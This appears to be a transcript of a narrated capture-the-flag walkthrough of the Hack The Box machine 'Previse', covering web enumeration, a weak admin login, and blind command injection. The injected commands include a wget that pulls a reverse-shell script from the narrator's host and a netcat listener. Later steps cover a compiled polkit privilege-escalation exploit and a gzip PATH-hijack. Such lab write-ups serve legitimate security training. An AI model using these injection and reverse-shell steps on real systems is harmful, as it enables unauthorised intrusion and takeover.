Hey guys, what's good? Simon Mage here. And yeah, honestly making videos is kind of very hard. I literally just made a video right now on another box and I completed it and the video was fine until my stupid OBS configuration. I accidentally hit a hotkey and then you couldn't see my screen for the rest of the video. So that video is gone, thrown out now. And right after that, I'm making another one. I just picked a random box. And in this one, we're going to be doing Previse, yeah, or Previs, whatever you want to call it. I've already ran my scans over here, so we have port 22 and 80, and obviously we're probably going to start off with 80 because 22 we can't really do anything except brute forcing, which is very inefficient. So let's go ahead and take a look at port 80. I have burp on right now. I'm going to make sure it intercepts burp. Perfect. And we have this over here. So my first thought of just looking at this looks like a terrible website. My first thought is trying SQL injection. So let's go here and just write admin this password username or password is invalid. Well, I did make that request, which is good to know. I'm not going to play around with this website or this SQL injection too much right now. What I'm going to try to do is first I'm going to check this type of thing, PHP. Perfect. I'm going to run fuff while I play around with this. So I'm trying to finish this as fast as I can. So hopefully this box does work out. Um, because I already, just did a box. I'm kind of tired. So, PHP, and let's also do dot HTML, and we should be good to go. We have download, login, files. Whoa, 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 whoa. All right, let's go ahead and check these ones out. So let's start with index.php. Nothing, it just goes to login. Redirection 302s. So yeah, login files, another 302. Header.php, this might be worth seeing. Nothing on header.php unless there is something that this gives a response with, and there's really nothing here. Login, download, and nothing. Config.php, this seems to be giving us nothing, it's blank. Accounts.php, redirection. Well, we can see what happens here. And we should also check out these two as well. So let's quickly do that. Okay, let's put nav. And we do have this accounts. We have the create account section over here. Nope. Files. Nope. Redirection. Nope. Nope. And the last thing to check is footer.php. So footer.php, and that's all we get. Let's go ahead and continue with SQL injection. For now, I'm going to take the login request that we made. So post request, it's a post obviously. So let's go ahead and copy this. And I'm going to create a file over here, make a directory, and the box name. And let's go ahead and do nano request.txt. I'm going to paste this in here, and I'll just leave it like that. Our request.txt parameter is going to be, what was it again? Username, I believe. Please only use valid parameters so SQL can run properly. Okay. Nano, let's try to change the username to, and this should be okay. And we don't really seem to be getting anything. I'm going to turn this up to risk 3 level 5. While this is running, we can think of other things to try. Username or invalid username or password. Try admin. let's try to do some SQL injection in the password column. No. Let's go ahead and check out the source code for this. We do have nothing really here. Yeah, nothing. File storage. Running this here. Really nothing. Let's go ahead and just check out what this session ID actually contains. So we can go over here to decode, URL decode, nothing. HTB 64. Okay. Ski has nothing here. And yeah. Oh well. So let's go back over here. This has to be some type of SQL injection because that's probably it. Come on. Also, I'm a bit sick, so sorry about the coughing. I'll try to control it throughout the video. Weird guess, but let's go ahead and try this. Search exploit. Nope. File storage. Oh. So we gotta gain access to this somehow. Let's go send to repeater and play around with this. I think before even trying a skill injection, we should at least try admin. Admin password. Previse. What is PWA? Let's try this again. Search exploit. Am I missing something? Oh, look at this. We found this. What the hell? Where did this come from? So we did find this file over here. Let's go ahead and visit this. This is why you keep burp on the whole time. So let's go here. Turn this on here. Burp. And nothing comes up. What the hell? Only admin should be able to access this page. Username, password, and this just redirects. It shows us and then redirects. And now I am thinking about let's go ahead and copy this, see if we get it. No, but it does give us some type of information here. Maybe we can find something sensitive. Don't have one, create one here. Oh yeah, you can check JavaScript files. This is strange. I'm thinking that we use, it's probably going to involve some brute forcing. Admin. All right, let's go ahead and try this. Um, okay, web enumeration. I'm just going to my notes right now to get my commands. Web attacks. Okay. I doubt this would work, but let's give it a try. So in this case, the IP we're trying to target is this. So let's put this IP in here. Port, don't really need. HTTP post, and we are going to be doing it from login.php. Perfect. The username field will have our username, and the password field will have the password, and the failure will be hmm. Let's go ahead and write admin over here. And we can try 1,000, why not? We don't need that. We can just put lowercase l. See if we can get a hit. Hmm. 0 passwords found. No worries. Let's try to change this request to a post request. Let's try to do username. Username equals admin. Password needs to be provided. Password equals admin. And how would this look like? Name confirm. We can try this one. Paste confirm equals admin. Okay, wow. That was fucking easy. Admin and admin. Well, thanks for the web course, bro. The web course really does help. All right, then. So we made an account. We got access here. We can access the files here, and we do have this. Let's go ahead and download this piece of shit. And we have all of this now. It's online and connected. Okay. So accessing this, and we failed with our SQL injection stuff. If we click admin here, we get nothing. But if we give here, we can go to website status, which is this, and a log data. We can put it in tab format and take a look. Interesting. Accounts, file, status, this, accounts.php, this. And now what I'm thinking is maybe there's an SQL injection vulnerabilities in the create account section. I'd be surprised to see that. Let's go ahead and try admin, admin again. This time I'm going to put this colon in here. Username can only contain this and this. Let's go ahead and try something over here. Username is already taken. Let's go ahead and try admina. Passwords do not match. The hint that we get is this is connected and stuff. So what I'm thinking now is we go back here. And there's a config.php, which we can't really check out, but we did download that file over here. So, and oops, this is this file, and you might be able to get the config.php, which does provide us with a user and this. So we're able to connect MySQL password, root, this. there are 2 registered admins. So when I check the log file, whoops, I should probably close this. Yeah, so when I check the log file, let's see now, where is it? I believe the user is this that we're trying to look for. So what I'm going to try to do right now is I'm going to cancel this. I'm going to just try SSH with this user to see if it works. And I'm going to try the password that's given in the config file. Accounts. This is probably not going to work, but there's always a possibility. Okay then. Oops. So 2 registered admins. There is 1 uploaded files. We have this. It reveals config. User's new guy. Okay. That makes sense. But how can we get a reverse shell and then access the database? What's this whole thing? My bad. I didn't copy everything correctly. So I'm thinking of logging out over here and logging in with new guy. Okay, we can try it with maybe they give us access to something special. No, they don't. Oh well. Just log in with admin can accounts. Interesting. So, I want to know where this file is kept, this backup zip, whatever we found. Where is this kept? Status.php doesn't show anything. Oh, okay, now I kind of get it. Admin, or we can go here, or log data. Let's put coma and see what we get here. Space. So this shows us that which users are downloading files, and there's only 1 file here. And what I'm thinking right now is, does it want us to upload a file here? Let's go ahead and try something. So we uploaded that. We can go to log data. And we should see something happen. I'm just testing out what it could be, what happens. I also want to just check out these files again. Interesting. So what I'm thinking right now is because all of these files are on the same site and they keep it over there. What's it called again? This file is called site backup. Interesting. Should I upload another zip file just like this but with my own .php extension? That's what I'm thinking right now because everything seems to be on this side, right? Maybe they used the site backup somewhere or whatever. Let's go ahead and check out log date and see if this user is downloading it. And we don't have any hits over here yet, so I'm kind of wondering. That's my only plan that I could think of right now, just looking at all of this. Hmm. And we can go to logs. Log script, post request, delim. So every time we do delim, there seems to be something running here. Is a command injection possible in here? Let's go ahead and check out logs, comma this. So what I'm gonna do right now is we write comma and that spells out this whole thing over here. Damn it, where is it? So we have comma here, it's done here. I'm gonna go ahead and try to do this. Who am I? Um, Actually, I'm gonna try to do it with this way over here. So target proxy intercept on. Let's go here and do this. Forward. Nothing here. Let's try space. And maybe we can change this to ID forward. Maybe it's a blind one. So let's do submit here. I'm actually going to complete this whole thing. So yeah. wget 10.10.14.10 test. Forward. And it is a blind one. Okay. Okay, damn it. That is kind of annoying. But hopefully things work out well. So we have a directory named Previse. I'm going to go ahead and move shell.sh. Oops. Well, there was the previous one that I finished. Where was it? I forgot which one it was, but it's fine. We can go to Previse, and I'm going to create something called shell.sh. And from this, I'm going to go to revshells .com. It has my IPs in here and it's port 80, and I'm gonna put a couple of these in. So I'm gonna put this, actually, yeah, that's fine. So we're gonna put this one, oops, this one, this one. And we're gonna put one more, which is gonna be this one. And the reason why I'm putting a lot is because sometimes one of them doesn't work for some reason or something happens. This just has been working for me. And let's go ahead and do this bin bash. And I'm gonna go ahead and now host it, and we're gonna host it on 8,000. And I'm gonna go ahead and go to this request again, submit, and yeah, wget 10.10.14.10 and shell.sh. I'm going to output that to shell.sh. And forward it. And it's not going to work because we did not put port 8000. So let's go ahead and paste this in here. 8123. Forward. And it has gotten our shell.sh. Let's go ahead and create sudo netcat lvnp80. Let's go ahead and run this now. Bro, what is going on with me? Submit this. And now we're going to do command plus x plus, is this even going to work? Even if it doesn't, let's just, I think we can just do straight up bash. And let's see what happens. And we get nothing. Let's go ahead and try that again. Or something happened, I guess. Okay, there it is. And we're going to change this and do command plus x. I don't want to use the plus because of URL encoding stuff, but I'm going to try to ask ChatGPT for this actually. ChatGPT. What we're going to ask is command plus x, how to make it executable without plus x. Yeah, I tried that. It didn't work for some reason. We can go ahead and try this then. Plus this. And see what we get from this. Forward. Nothing. Oh well, let's try to do a regular shell then. Keep opening this. I'm going to close it because it's getting annoying. And what I'm going to try to do is, let's go to that page, submit this here. Submit it here. I'm going to do it one more time actually. Okay, that's fine. Submit it again. Let's just do it a regular way. I'm going to go to my notes. And let's try it this way. I have this command in my notes, all URL encoded. All I have to do is change this to our IP, which is 10.10.14.4. And I'm going to change this 4444 to 80. And let's just hope it works. Forward. Oh, well, it didn't work. Let's try it again. Forward. Hmm. Let's go ahead and try this URL encode this. I'm going to send it to repeater. And it's slow in its response, but it's still not a good sign. Oh well. We can cancel this. I'm going to check if this actually works with this. So I'm going to do wget plus 10 or 14, 10 test just to check if everything is working in repeater before we keep trying to practice with it. 10, 10, 14, 10, 8,000. And it doesn't seem to be working in repeater, which is why it's probably because of this. Let's go with intercept off. Okay, that did not work. 1,000. Let's go ahead and do this again. What is going on in here? Okay, so we got it somehow. Crazy, crazy. So I don't know how that worked out, but it just seems to have done it. So everything is working, it was just really going late, and I guess one of the commands did run. If I do ls here, you'll see we uploaded shell.sh, or it's probably one of the actual these commands that I gave and it ran. And we can probably check here, and it is the RM one that we put over here, which ran. So yeah, that is pretty much it. Crazy. So let's go ahead and we have to make sure our shell is stable. So I'm going to go ahead and go to hack tricks. I'm going to go over here and write full TTY. Go here, and this is the command that we want to run. So before we do all of this, I want to go ahead and copy this. SSTY or SS, or what was it? STTY/A. And the value that we have here is 44 and 174. So let's change this to 174. And I'm just going to copy all of this. And all we have to do is Control Z. Control Z. Oh, Control Z. Paste this here. Enter again. ID. Okay, it just didn't work out. I guess we should have went slower. Let's try that again. I'm gonna go ahead and do it till this. I'm gonna exit out of here, actually. Yeah. We'll have to do it again. No worries. And all we have to do is submit this. Copy this, paste it here, and forward. And it did work now. So now we're just gonna go to hack trick again. And I'm gonna stop it at this area. So Control Z. And I think we should just do this. Maybe that's the reason why this is happening. Okay. So we'll just keep it as this. We do have my SQL over here, which we can check. Hopefully this will give us some type of stable shell. And I'm gonna go back to something else. And this is why we need a full proper shell. Oh, that's why it's not working. Oh my god, I'm so dumb. The reason why it's not working is because we forgot to run this command at the start. So we do this. Perfect. Next, we do all of this. Control Z. ID. Who am I? Clear. Term variable not set. Just copy this again. Paste it in there. Clear. Perfect. Now we are good to go. MySQL user root password. Let's copy all of this. Paste in here. Show databases. All right. Use Previse. Is that what you call it? Show tables. Select all from accounts. I spelled it wrong. Select all from accounts And we do have this, and this is assault over here. So I guess they expected us to do something like this. No worries. Unless this, we can get out of here. Probably nothing going to be in here. We can leave this as well. Let's check home to see what type of users we have. Malware. And do we have access to the user.txt file? No, we don't. It's only readable by this user over here. Dash config. Can't really do anything in here. Oh well. So we can do uname/a. We do notice it's an old box. Probably don't have access to that. But because it's an old box, I'm gonna go ahead and see if GCC is installed. And it is installed. And I'm gonna go straight up and just try a box because I've encountered this version before. I'm just gonna go ahead and try something in here, which is an old exploit. Let's see if this works. I'm just going to my notes to get it out real quick. Yeah, pull kit stuff, you know? So, CVE, I already have it installed here, I think. Strange, it's not here anymore. No worries, we'll just do it again. Do this. Go to CVE, host this, Python 3, and now we can go ahead and copy this to our server. We're in the temp directory, which is good. 10.10.14.10 and output that as, there we go. So now that we have this here, we can compile this. Just gonna copy it from my notes. And let's run this. And we are root. Okay, we didn't even need to use anything. That was a pretty easy box. I was thinking of escalating to well, sorry. Yeah, I was thinking about escalating to the other user, the malware one, but when I found out the version, I was like, you know, if this works, we're automatically root. But let's go ahead and see what the hell this box actually contains. Maybe we did it in the not the proper way, and we'll go ahead and check one of these users. So this, create a new account. So we probably did this the right way. Oh, it did crack the password. Okay. We can use hashcat to crack the password for malware user. Interesting. So it does work. I thought like that salt thing in there wouldn't allow it to work, which is why I ignored it. But it makes sense to use it to gain access. It's 100%. That is usually the type of way where you go to the database for the server, you pull out a user, and you try to see if you can get SSH. So user.txt get in root. What did he do over here? Oh, it's a completely different way. Oh my god, that really sucks. You know, blah, blah, blah. Okay, nothing there. Okay, you can run this as root. We have this over here, access log. Okay, gzip does not use an absolute path. That completely makes sense. Yeah. Okay. So you see gzip, the command over here that's being ran. There's no absolute path towards this binary file. So we could kind of like hijack it. And for example, in this case, what he's going to do is he's going to put in the paths section what is he going to put? He made a gzip file that gets a reverse shell right over here. So a gzip binary file or bash file that will get a reverse shell. He made it executable. He echoed the path and he put to, I have no idea what this is, but usually export path pwd to paths. So I believe he's adding the current path that he's in into the path variable. And that's why when this is going to run, the first place it's going to run gzip from is the current pwd section or wherever pwd is. So that's pretty much it on what this guy did over here. We would have still been able to do this 110%, you know. But yeah, that is pretty much it. We still got root.txt and we are good to go. So I'll see you for the next video, guys, and take care.